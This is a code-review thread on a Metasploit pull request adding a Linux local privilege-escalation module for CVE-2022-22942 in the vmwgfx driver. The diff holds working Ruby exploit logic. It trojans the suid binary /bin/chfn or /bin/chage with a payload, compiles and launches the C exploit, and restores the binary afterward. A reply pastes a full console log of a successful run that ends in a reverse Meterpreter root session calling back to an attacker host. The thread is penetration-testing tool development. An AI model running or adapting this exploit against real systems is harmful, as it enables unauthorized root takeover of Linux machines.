modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb

```diff
@@ -0,0 +1,178 @@
+    elsif writable?('/bin/chage') # RHEL/Centos
+      @suid_target = '/bin/chage'
+    else
+      return CheckCode::Safe('Unable to write to /bin/chfn or /bin/chage')
+    end
+    vprint_good("#{@suid_target} suid binary found")
+
+    vmwgfx = cmd_exec('modinfo vmwgfx | grep version')
+    if vmwgfx.include? 'version'
+      return CheckCode::Appears('vmwgfx installed')
+    end
+
+    CheckCode::Safe('Vulnerable driver (vmwgfx) not found')
+  end
+
+  def exploit
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # backup the suid binary before we overwrite it
+    @suid_backup = read_file(@suid_target)
+    path = store_loot(
+      @suid_target,
+      'application/octet-stream',
+      rhost,
+      @suid_backup,
+      @suid_target
+    )
+    print_good("Original #{@suid_target} backed up to #{path}")
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+      c_code = exploit_data('CVE-2022-22942', 'cve-2022-22942-dc.c')
+      c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called
+      c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target
+      c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload
+
+      upload_and_compile executable_path, strip_comments(c_code)
+      register_files_for_cleanup(executable_path)
+    else
+      unless @suid_target == '/bin/chfn'
+        fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')
+      end
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      payload_path = '/tmp/.aYd3GAMlK'
+      upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')
+    end
+
+    # Upload payload executable
+    print_status("Uploading payload to #{payload_path}")
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(generate_payload_exe)
+
+    print_status 'Launching exploit...'
+    output = cmd_exec executable_path, nil, 30
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  # replace our suid target back to the original so we don't leave
+  def on_new_session(session)
+    super
+    if @suid_backup.nil?
+      print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")
+    else
+      print_status("Replacing trojaned #{@suid_target} with original")
+      fd = session.fs.file.open(@suid_target, 'wb')
```

Comment:
I'm not sure if `session.fs.file.open` is usable on shell sessions. I thought it was Meterpreter only.

The module `SessionTypes` lists both `shell` and `meterpreter`.

Reply:
seems to actually work, but i'm going to go with a better answer.

```
msf6 exploit(multi/script/web_delivery) > sessions -l

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               2.2.2.2:4444 -> 1.1.1.1:47318 (1.1.1.1)

msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /root/.msf4/loot/20230117174516_default_1.1.1.1_binchfn_923893.bin
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Max line length is 65537
[*] Writing 10812 bytes in 1 chunks of 39245 bytes (octal-encoded), using printf
[*] Uploading payload to /tmp/.GW3waLU
[*] Writing '/tmp/.GW3waLU' (282 bytes) ...
[*] Max line length is 65537
[*] Writing 282 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 1.1.1.1
[*] [~] creating r/o mapping of /bin/chfn...
[*] [~] creating r/o mapping of /tmp/.GW3waLU...
[*] [~] spawning helper processes...
[*] [~] vmwgfx setup using /dev/dri/card0...
[*] [+] confirmed to be targeting the right driver
[*] [~] predicted fence fd = 6
[*] [~] triggering fence fd export...
[*] [~] RCU GP passed and file object released -- by now or soon!
[*] [~] probing stale fd for a match...
[*] [~] closing stale fd...
[*] [~] RCU GP passed and file object released again -- hopefully!
[*] [~] stale_fd_worker: done
[+] Deleted /tmp/.YvQO9il
[*] Replacing trojaned /bin/chfn with original
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:47320) at 2023-01-17 17:45:21 -0500

meterpreter >
```

Reply:
I should say it didn't throw an error, I didn't verify the file was rewritten successfully